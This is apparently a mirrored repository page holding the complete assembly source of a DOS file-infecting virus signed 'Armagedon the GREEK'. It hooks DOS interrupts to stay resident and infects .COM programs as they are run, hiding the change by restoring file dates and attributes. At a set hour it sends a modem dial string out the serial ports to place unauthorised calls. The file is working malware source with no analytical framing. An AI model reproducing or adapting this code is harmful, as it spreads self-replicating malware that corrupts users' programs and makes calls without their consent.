mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-21 17:48:52 +00:00
524 lines
17 KiB
NASM
524 lines
17 KiB
NASM
|
dta equ offset last_byte+10
|
|||
|
virlen equ (offset last_byte - offset start)
|
|||
|
strlen equ (offset endstr - offset startstr)
|
|||
|
|
|||
|
code segment
|
|||
|
assume cs:code,ds:code
|
|||
|
org 100h
|
|||
|
start: jmp main
|
|||
|
|
|||
|
newint21 proc far ; SETS THE 'INT 21h' VIRUSED
|
|||
|
pushf ; Save flags for compare
|
|||
|
cmp ah,0e0h ; Is it exist-test?
|
|||
|
jnz notest1 ; if not go on
|
|||
|
mov ax,0dadah ; else return signature,
|
|||
|
popf ; restore flag and
|
|||
|
iret ; return to program
|
|||
|
notest1: cmp ah,0e1h
|
|||
|
jnz notest2
|
|||
|
mov ax,cs
|
|||
|
popf
|
|||
|
iret
|
|||
|
notest2: cmp ax,4b00h ; is 'EXEC' command?
|
|||
|
jz infector ; if yes go to 'infection'
|
|||
|
do_oldint: popf ; restore flags
|
|||
|
jmp dword ptr cs:oldint21a; jump to normal INT 21h
|
|||
|
newint21 endp
|
|||
|
|
|||
|
oldint21a dw ? ; old INT 21h vector (low)
|
|||
|
oldint21b dw ? ; old INT 21h vector (high)
|
|||
|
oldint8a dw ? ; old INT 8 vector (low)
|
|||
|
oldint8b dw ? ; old INT 8 vector (high)
|
|||
|
status db 0 ; flag for time (call in progress)
|
|||
|
ticks db 0 ; 18.2 tick counter
|
|||
|
cur_h db 0 ; Current time (HOURS)
|
|||
|
cur_m db 0 ; Current time (MINUTES)
|
|||
|
cur_s db 0 ; Current time (SECONDS)
|
|||
|
count dw 0 ; dial counter (30 sec, 540 ticks)
|
|||
|
garbidge db 0
|
|||
|
stringpos db 0
|
|||
|
call_made db 0
|
|||
|
init_done db 0
|
|||
|
comext db 'COM' ; Valid inf. extension
|
|||
|
handle dw ? ; inf. handle number
|
|||
|
filesize dw 20
|
|||
|
prseg dw ?
|
|||
|
seg_buffer dw ?
|
|||
|
ss_reg dw ?
|
|||
|
sp_reg dw ?
|
|||
|
fileds dw ?
|
|||
|
filedx dw ?
|
|||
|
attr dw ?
|
|||
|
filedate dw ?
|
|||
|
filetime dw ?
|
|||
|
|
|||
|
env_seg dw 00h
|
|||
|
cdline_offs dw 81h
|
|||
|
cdline_seg dw ?
|
|||
|
fcb1_offs dw 5ch
|
|||
|
fcb1_seg dw ?
|
|||
|
fcb2_offs dw 6ch
|
|||
|
fcb2_seg dw ?
|
|||
|
|
|||
|
infector proc near ; PROGRAM INFECTOR
|
|||
|
assume cs:code ;
|
|||
|
push ds ; save registers to
|
|||
|
push bx ; insure normal operation
|
|||
|
push si ; by the INT 21h (ah=4b00h)
|
|||
|
push cx ;
|
|||
|
push ax ;
|
|||
|
push dx ;
|
|||
|
push bp ;
|
|||
|
push es ;
|
|||
|
push di ;
|
|||
|
|
|||
|
cld ; Reset direction to increament
|
|||
|
push dx ; Store the address of the
|
|||
|
push ds ; filespec (DS:DX)
|
|||
|
xor cx,cx ; reset counter
|
|||
|
mov si,dx ; set ptr to filespec
|
|||
|
nxtchr: mov al,ds:[si] ; take a char
|
|||
|
cmp al,0 ; is it zero?
|
|||
|
jz okay ; if yes goto okay
|
|||
|
inc cx ; else increase counter
|
|||
|
inc si ; and pointer
|
|||
|
jmp nxtchr ; take the next chr if CX>0
|
|||
|
okay:
|
|||
|
add dx,cx ; Point to end of filespec
|
|||
|
sub dx,3 ; point to .EXT
|
|||
|
mov si,offset comext ; Check if it is a
|
|||
|
mov di,dx ; .COM file
|
|||
|
cmp byte ptr ds:[di-3],'N';
|
|||
|
jnz ok_1 ; Is it a ND. ?
|
|||
|
cmp byte ptr ds:[di-2],'D'; if yes exit!
|
|||
|
jz nmatch ;
|
|||
|
ok_1: mov cx,3 ; checking counter in 3
|
|||
|
cmp_loop: mov al,cs:[si] ; take 1st ptr's chr
|
|||
|
cmp al,ds:[di] ; and compare it with filespec
|
|||
|
jnz nmatch ; If no matching, exit
|
|||
|
inc si ; else increase 1st ptr
|
|||
|
inc di ; and second ptr
|
|||
|
loop cmp_loop ; take next compare if CX>0
|
|||
|
|
|||
|
pop ds ; restore ds and dx to point
|
|||
|
pop dx ;
|
|||
|
|
|||
|
push dx ; Store pointer
|
|||
|
push ds ;
|
|||
|
mov si,dx ; Check if filespec
|
|||
|
mov dl,0 ; contains a drive
|
|||
|
cmp byte ptr ds:[si+1],':'; letter
|
|||
|
jnz nodrive ; If no jump to nodrive spec.
|
|||
|
mov dl,ds:[si] ; else take the drive in DL
|
|||
|
and dl,0fh ; and modify for int 21h (ah=36h)
|
|||
|
nodrive: mov ah,36h ; Take free disk space of DL disk
|
|||
|
int 21h ; Do the call
|
|||
|
cmp ax,0ffffh ; Was an invalid drive specified?
|
|||
|
jz nmatch ; if yes, exit
|
|||
|
jmp bypass ; Correct jx 127 limit
|
|||
|
|
|||
|
nmatch: jmp nomatch
|
|||
|
invd: jmp invdrive
|
|||
|
closeit1: jmp closeit
|
|||
|
resdta1: jmp resdta
|
|||
|
|
|||
|
bypass: cmp bx,3 ; Are there at least 3 clust. free?
|
|||
|
jb nmatch ; If no, exit
|
|||
|
pop ds ; restore pointers
|
|||
|
pop dx ;
|
|||
|
|
|||
|
push ds ; and allocate memory
|
|||
|
push dx ; for the infection
|
|||
|
mov cs:fileds,ds
|
|||
|
mov cs:filedx,dx
|
|||
|
mov ax,4300h ; code for Get Attr
|
|||
|
int 21h
|
|||
|
mov cs:attr,cx
|
|||
|
mov ax,4301h
|
|||
|
xor cx,cx
|
|||
|
int 21h
|
|||
|
|
|||
|
mov bx,0ffffh
|
|||
|
mov ah,48h
|
|||
|
int 21h
|
|||
|
mov ah,48h
|
|||
|
int 21h
|
|||
|
mov cs:seg_buffer,ax
|
|||
|
|
|||
|
mov ax,cs
|
|||
|
mov ds,ax
|
|||
|
mov dx,dta
|
|||
|
mov ah,1ah
|
|||
|
int 21h
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
mov ax,3d02h ; DosFn OPEN FILE (R/W)
|
|||
|
clc ; Clear carry flag
|
|||
|
int 21h ; Do open
|
|||
|
jc closeit1 ; If Error exit
|
|||
|
mov bx,ax ; Handle to BX
|
|||
|
mov cs:handle,ax ; save handle
|
|||
|
mov cx,0ffffh ; Bytes to read
|
|||
|
mov ax,cs:seg_buffer ;
|
|||
|
mov ds,ax ;
|
|||
|
mov dx,virlen ; DS:DX points to buffer
|
|||
|
mov ah,3fh ; DosFn READ FROM FILE
|
|||
|
clc ; clear carry flag
|
|||
|
int 21h ; Do the call
|
|||
|
jc closeit1 ; if error exit
|
|||
|
mov cs:filesize,ax ; Num of bytes actually read
|
|||
|
;cmp ax,0e000h ; max com size to infect
|
|||
|
;ja closeit1 ; if size>max exit
|
|||
|
cmp ax,virlen ; if filesize is less than the
|
|||
|
jb virit ; virus size then it is clean
|
|||
|
mov si,virlen+1 ; Set 1st ptr to START of file
|
|||
|
add si,si ; add 1st ptr the length of file
|
|||
|
sub si,21 ; and subtract 12 to point to sig.
|
|||
|
mov cx,19 ; set the test loop to 10 bytes
|
|||
|
mov di,offset signature ; Set 2nd ptr to constant signature
|
|||
|
test_sig: mov al,ds:[si] ; take the byte pointed to by SI
|
|||
|
mov ah,cs:[di] ; and compare it with the byte
|
|||
|
cmp ah,al ; pointed to by DI
|
|||
|
jne virit ; if not equal then it is clean!
|
|||
|
inc si ; else increase 1st pointer
|
|||
|
inc di ; increase 2nd pointer
|
|||
|
loop test_sig ; continue with next if CX>0
|
|||
|
jmp closeit
|
|||
|
|
|||
|
virit: mov ax,4200h ; Code for LSEEK (Start)
|
|||
|
mov bx,cs:handle ; Handle num in BX
|
|||
|
xor cx,cx ; Reset CX
|
|||
|
mov dx,cx ; and DX
|
|||
|
int 21h ; Do the call
|
|||
|
jc closeit
|
|||
|
|
|||
|
mov si,offset start
|
|||
|
mov cx,virlen
|
|||
|
xor di,di
|
|||
|
mov ax,cs:seg_buffer
|
|||
|
mov ds,ax
|
|||
|
virusin: mov al,cs:[si]
|
|||
|
mov ds:[di],al
|
|||
|
inc si
|
|||
|
inc di
|
|||
|
loop virusin
|
|||
|
|
|||
|
mov ax,5700h
|
|||
|
mov bx,cs:handle
|
|||
|
int 21h
|
|||
|
mov cs:filetime,cx
|
|||
|
mov cs:filedate,dx
|
|||
|
|
|||
|
mov ax,cs:seg_buffer
|
|||
|
mov ds,ax
|
|||
|
|
|||
|
mov si,virlen
|
|||
|
mov al,ds:[si]
|
|||
|
add al,11
|
|||
|
mov ds:[si],al
|
|||
|
|
|||
|
xor dx,dx ; DX points to Buffer (file)
|
|||
|
mov cx,cs:filesize ; Size of file in CX
|
|||
|
add cx,virlen ; But added by Virlen
|
|||
|
mov bx,cs:handle ; File handle num in BX
|
|||
|
mov ah,40h ; Code for WRITE FILE
|
|||
|
int 21h ; Do the call
|
|||
|
|
|||
|
mov cx,cs:filetime
|
|||
|
mov dx,cs:filedate
|
|||
|
mov bx,cs:handle
|
|||
|
mov ax,5701h
|
|||
|
int 21h
|
|||
|
|
|||
|
closeit: mov bx,cs:handle ; Handle in BX
|
|||
|
mov ah,3eh ; Code for CLOSE FILE
|
|||
|
int 21h ; Do close it
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
resdta: mov dx,80h ; Reset the DTA
|
|||
|
mov ah,1ah ; in Address 80H
|
|||
|
int 21h ; Do call
|
|||
|
mov ax,cs:seg_buffer
|
|||
|
mov es,ax
|
|||
|
mov ah,49h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,cs:fileds ;
|
|||
|
mov ds,ax ;
|
|||
|
mov dx,cs:filedx ;
|
|||
|
mov ax,4301h ;
|
|||
|
mov cx,cs:attr ;
|
|||
|
int 21h ;
|
|||
|
jmp invdrive ; and exit
|
|||
|
nomatch:
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
jmp notinfect
|
|||
|
|
|||
|
invdrive:
|
|||
|
notinfect:
|
|||
|
pop di ; restore registers
|
|||
|
pop es ; to their initial
|
|||
|
pop bp ; values
|
|||
|
pop dx ;
|
|||
|
pop ax ;
|
|||
|
pop cx ;
|
|||
|
pop si ;
|
|||
|
pop bx ;
|
|||
|
pop ds ;
|
|||
|
jmp do_oldint ; return from call
|
|||
|
infector endp
|
|||
|
|
|||
|
newint8 proc far ; VIRUS' TIMER ISR
|
|||
|
push bp ;
|
|||
|
push ds ; store all registers
|
|||
|
push es ; and flags before
|
|||
|
push ax ; the new timer
|
|||
|
push bx ; operations.
|
|||
|
push cx ; Otherwize a 'crush'
|
|||
|
push dx ; is unavoidable
|
|||
|
push si ;
|
|||
|
push di ;
|
|||
|
pushf ; Simulate an INT
|
|||
|
call dword ptr cs:oldint8a ; Do old timer stuff
|
|||
|
call tick ; update virus clock routine
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ah,5 ; Check if time
|
|||
|
mov ch,cur_h ; is now above the
|
|||
|
cmp ah,ch ; lower limit (5 o'clock)
|
|||
|
ja exitpoint ; if not, exit
|
|||
|
mov ah,6 ; Check if time
|
|||
|
cmp ah,ch ; is now below the higher limit
|
|||
|
jb exitpoint ; if not, exit
|
|||
|
mov ah,status ; get the virus status
|
|||
|
cmp ah,1 ; test if call in progress
|
|||
|
jz in_progress ; if yes goto countdown routine
|
|||
|
mov ah,1 ; if not, set the status to
|
|||
|
mov status,ah ; indicate 'In progress'
|
|||
|
jmp exitpoint ; and exit
|
|||
|
in_progress: ; CALL IS IN PROGRESS!
|
|||
|
call dial ; else call dial routine
|
|||
|
inc count ; CALL_TIMER
|
|||
|
mov ax,count
|
|||
|
cmp ax,540 ; check for time-out
|
|||
|
jne exitpoint ; if not, exit else
|
|||
|
xor ax,ax ; set status to indicate
|
|||
|
mov status,ah ; 'ready to call'!
|
|||
|
mov count,ax ; reset call_timer
|
|||
|
mov call_made,ah
|
|||
|
exitpoint:
|
|||
|
pop di ; restore registers to
|
|||
|
pop si ; their values and
|
|||
|
pop dx ;
|
|||
|
pop cx ;
|
|||
|
pop bx ;
|
|||
|
pop ax ;
|
|||
|
pop es ;
|
|||
|
pop ds ;
|
|||
|
pop bp ;
|
|||
|
iret ; return to program
|
|||
|
newint8 endp
|
|||
|
|
|||
|
tick proc near ; VIRUS' CLOCK ROUTINE
|
|||
|
assume cs:code,ds:code
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
xor al,al
|
|||
|
mov ah,ticks ; test if ticks have
|
|||
|
cmp ah,17 ; reached limit (17)
|
|||
|
jnz incticks ; if no, incerase ticks
|
|||
|
mov ah,cur_s ; test if seconds have
|
|||
|
cmp ah,59 ; reached limit (59)
|
|||
|
jnz incsec ; if no, increase seconds
|
|||
|
mov ah,cur_m ; test if minutes have
|
|||
|
cmp ah,59 ; reached limit (59)
|
|||
|
jnz incmin ; if no, increase minutes
|
|||
|
mov ah,cur_h ; test if hours have
|
|||
|
cmp ah,23 ; reached limit (23)
|
|||
|
jnz inchour ; if no, increase hours
|
|||
|
mov cur_h,al ; else reset hours
|
|||
|
exitp3: mov cur_m,al ; reset minutes
|
|||
|
exitp2: mov cur_s,al ; reset seconds
|
|||
|
exitp1: mov ticks,al ; reset ticks
|
|||
|
ret ; end exit
|
|||
|
incticks: inc ticks ; increase ticks
|
|||
|
ret ; and exit
|
|||
|
incsec: inc cur_s ; increase seconds
|
|||
|
jmp exitp1 ; and exit
|
|||
|
incmin: inc cur_m ; increase minutes
|
|||
|
jmp exitp2 ; and exit
|
|||
|
inchour: inc cur_h ; increase hours
|
|||
|
jmp exitp3 ; end exit
|
|||
|
tick endp
|
|||
|
|
|||
|
startstr:
|
|||
|
string db '+++aTh0m0s7=35dp081,,,,141'
|
|||
|
endstr:
|
|||
|
|
|||
|
dial proc near
|
|||
|
assume cs:code,ds:code
|
|||
|
|
|||
|
mov al,call_made
|
|||
|
cmp al,1
|
|||
|
jz exit_dial
|
|||
|
mov al,init_done
|
|||
|
cmp al,1
|
|||
|
jz send_one
|
|||
|
|
|||
|
mov cx,3
|
|||
|
next_init: mov dx,cx
|
|||
|
xor ah,ah
|
|||
|
mov al,131
|
|||
|
int 14h
|
|||
|
loop next_init
|
|||
|
mov al,1
|
|||
|
mov init_done,al
|
|||
|
jmp exit_dial
|
|||
|
|
|||
|
send_one: push cs
|
|||
|
pop ds
|
|||
|
mov si,offset string
|
|||
|
mov al,stringpos
|
|||
|
cmp al,strlen
|
|||
|
jnz do_send
|
|||
|
jmp sendret
|
|||
|
|
|||
|
do_send: xor ah,ah
|
|||
|
add si,ax
|
|||
|
next_char: mov al,[si]
|
|||
|
mov dx,3f8h
|
|||
|
out dx,al
|
|||
|
mov dx,2f8h
|
|||
|
out dx,al
|
|||
|
mov dx,2e8h
|
|||
|
out dx,al
|
|||
|
mov dx,3e8h
|
|||
|
out dx,al
|
|||
|
inc stringpos
|
|||
|
jmp exit_dial
|
|||
|
|
|||
|
sendret: mov cx,3
|
|||
|
retloop: mov dx,cx
|
|||
|
mov al,13
|
|||
|
mov ah,1
|
|||
|
int 14h
|
|||
|
loop retloop
|
|||
|
|
|||
|
reset: mov ax,0001h
|
|||
|
mov call_made,al
|
|||
|
mov stringpos,ah
|
|||
|
mov init_done,ah
|
|||
|
exit_dial: ret
|
|||
|
dial endp
|
|||
|
|
|||
|
main: ; VIRUS' MEMORY INSTALLER
|
|||
|
assume cs:code,ds:code ;
|
|||
|
mov ah,0e0h ; is VIRUS already
|
|||
|
int 21h ; in memory?
|
|||
|
cmp ax,0dadah ; if yes then
|
|||
|
jnz cont ; terminate, else
|
|||
|
jmp already_in
|
|||
|
cont: push cs
|
|||
|
pop ds
|
|||
|
mov ax,3521h ; capture the old
|
|||
|
int 21h ; INT 21h vector and
|
|||
|
mov oldint21a,bx ; store the absolute address
|
|||
|
mov oldint21b,es ; in 'oldint21x' variables
|
|||
|
mov dx,offset newint21 ; point to new INT 21h ISR
|
|||
|
mov ax,2521h ; replace it to vector
|
|||
|
int 21h ;
|
|||
|
mov ax,3508h ; capture the old
|
|||
|
int 21h ; timer vector and
|
|||
|
mov oldint8a,bx ; store the address
|
|||
|
mov oldint8b,es ; in 'oldint8x' var
|
|||
|
mov dx,offset newint8 ; point to new timer ISR
|
|||
|
mov ax,2508h ; replace it to vector
|
|||
|
int 21h ;
|
|||
|
mov ah,2ch ; get the current
|
|||
|
int 21h ; time from DOS
|
|||
|
mov cur_h,ch ; and store it
|
|||
|
mov cur_m,cl ; for the
|
|||
|
mov cur_s,dh ; virus' timer
|
|||
|
; RUN PROGRAM!
|
|||
|
mov ax,cs:[2ch]
|
|||
|
mov ds,ax
|
|||
|
xor si,si
|
|||
|
loop1: mov al,ds:[si]
|
|||
|
cmp al,1
|
|||
|
jz exitl1
|
|||
|
inc si
|
|||
|
jmp loop1
|
|||
|
exitl1: inc si
|
|||
|
inc si
|
|||
|
mov dx,si
|
|||
|
|
|||
|
mov ax,cs
|
|||
|
mov es,ax ; SHRINK BLOCK
|
|||
|
mov bx,90
|
|||
|
mov ah,4ah
|
|||
|
int 21h
|
|||
|
|
|||
|
mov bx,cs:[81h]
|
|||
|
mov ax,cs
|
|||
|
mov es,ax
|
|||
|
mov cs:fcb1_seg,ax
|
|||
|
mov cs:fcb2_seg,ax
|
|||
|
mov cs:cdline_seg,ax
|
|||
|
mov ax,4b00h
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
mov cs:ss_reg,ss
|
|||
|
mov cs:sp_reg,sp
|
|||
|
pushf
|
|||
|
call dword ptr cs:oldint21a
|
|||
|
mov ax,cs:ss_reg
|
|||
|
mov ss,ax
|
|||
|
mov ax,cs:sp_reg
|
|||
|
mov sp,ax
|
|||
|
mov ax,cs
|
|||
|
mov ds,ax
|
|||
|
mov dx,offset last_byte
|
|||
|
int 27h
|
|||
|
|
|||
|
already_in: mov ah,0e1h
|
|||
|
int 21h
|
|||
|
mov si,offset pokelabl
|
|||
|
mov cs:[si+3],ax
|
|||
|
mov ax,offset fix_com
|
|||
|
mov cs:[si+1],ax
|
|||
|
mov ax,cs:filesize
|
|||
|
mov bx,cs
|
|||
|
pokelabl: db 0eah,00h,00h,00h,00h
|
|||
|
|
|||
|
fix_com: mov cx,ax
|
|||
|
mov ds,bx
|
|||
|
mov si,100h
|
|||
|
mov di,100h+virlen
|
|||
|
dofix: mov al,ds:[di]
|
|||
|
mov ds:[si],al
|
|||
|
inc si
|
|||
|
inc di
|
|||
|
loop dofix
|
|||
|
mov si,offset poklb
|
|||
|
mov cs:[si+3],ds
|
|||
|
mov al,ds:[100h]
|
|||
|
sub al,11
|
|||
|
mov ds:[100h],al
|
|||
|
mov ax,ds
|
|||
|
mov es,ax
|
|||
|
mov ss,ax
|
|||
|
poklb: db 0eah,00h,01h,00h,00h
|
|||
|
|
|||
|
signature: db 'Armagedon the GREEK'
|
|||
|
last_byte: db 90h+11
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
mov ah,4ch
|
|||
|
int 21h
|
|||
|
code ends
|
|||
|
end start
|
|||
|
|